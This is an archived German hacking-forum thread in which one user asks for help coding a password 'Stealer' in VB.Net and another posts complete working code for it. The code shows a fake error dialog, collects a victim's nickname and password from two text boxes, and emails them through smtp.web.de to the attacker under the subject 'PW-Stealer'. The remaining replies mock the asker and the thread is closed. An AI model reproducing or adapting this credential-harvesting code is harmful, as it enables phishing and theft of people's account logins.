PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : VB.Net Email versenden



Eneth
01.06.2010, 21:11
Moin ich will mir n Stealer coden der die Daten aus der TextBox1 + 2 an ne Email sendet ich hab die Funktion fertig:

Imports System.Net.Mail
Public Class Form1

Private Sub EmailSenden(ByVal senderAdr As String, ByVal empfAdr As String, ByVal betreff As String, ByVal text As String)

Dim mail As New MailMessage(senderAdr = "Test", empfAdr = "Test", betreff = "Test", text = "Test")
Dim client As New SmtpClient("smtp.live.com")
client.Send(mail)
mail = Nothing
client = Nothing
End Sub
Ist das soweit richtig? und 2 Frage wie kann ich nun die funktion bei einem Button klick aufrufen sprich wenn Button1 angeklickt wird soll die email versendet werden:???

ExTaSy
01.06.2010, 21:54
Zu frage 2:

Einfach die Funktion in den Button rein:D

Eneth
01.06.2010, 21:58
Sobald ich mache Button1.Click etc EmailSenden wird mir EmailSenden sofort unterstrichen?!?

#AZURA
01.06.2010, 22:00
man man man immer diese kiddys


Imports System.Net
Imports System.Net.Mail




Public Class Form1

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
MessageBox.Show("Deine Fehlermeldung")
Dim text As String
text = "Nick:" & TextBox1.Text & vbNewLine & "Passwort:" & TextBox2.Text
Dim myClient As New Net.Mail.SmtpClient("smtp.web.de")
myClient.Credentials = New Net.NetworkCredential ("Deine erste E-Mail Addresse", "Passwort dazu")
myClient.Send ("Deine erste E-Mail Addresse", "Deine zweite E-Mail Addresse", "PW-Stealer", text)
myClient.Send("Deine E-Mail Addresse", "Deine zweite E-Mail Addresse, An die wird dann der Nickname und das Passwort geschickt", "PW-Stealer", text)

End Sub
End Class


tuh mir ein gefallen kopier das nicht sofort sonder versteh die funktion
wie du textboxen erstellst werde ich dir nicht verraten MUAHHA

krusty
01.06.2010, 22:02
ohjeee ohjeeeeeeee, basics !!!!
EmailSenden ist eine sub

Eneth
01.06.2010, 22:03
Danke 1NF3CT0R (http://free-hack.com/member.php?u=57570) ich kopier den Code nicht.
und wie man Textboxen macht weiss ich <.<

Sawyer
01.06.2010, 22:14
Sobald ich mache Button1.Click etc EmailSenden wird mir EmailSenden sofort unterstrichen?!?
:lol made my day!

Ich glaub es ist besser ich schließe hier. Lerne die Grundlagen und dann sehen wir weiter.